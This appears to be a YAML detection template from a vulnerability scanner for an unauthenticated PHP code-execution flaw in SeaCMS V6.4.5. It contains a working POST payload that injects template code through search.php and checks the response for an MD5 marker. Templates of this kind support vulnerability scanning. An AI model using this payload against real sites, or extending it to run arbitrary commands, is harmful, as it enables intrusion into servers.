product: SeaCMS(海洋CMS)
vName: SeaCMS V6.4.5 RCE
type: 代码执行
vID: [ ]
level: 3
vDesc: A vulnerability in SeaCMS allows remote unauthenticated attackers to execute arbitrary PHP code.
version: ''
note: ''
search: { }
protocol: http
link: https://mengsec.com/2018/08/06/SeaCMS-v6-45前台代码执行漏洞分析/
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: post
      follow: false
      path: /search.php?searchtype=5
      data: searchtype=5&order=}{end if} {if:1)echo md5('seacms');if(1}{end if}
    verify:
      logic: and
      check:
        - body:
            value:
              - b1e597fa44dfd7669966bfab04eeb8ea
            logic: and
        - status: 200
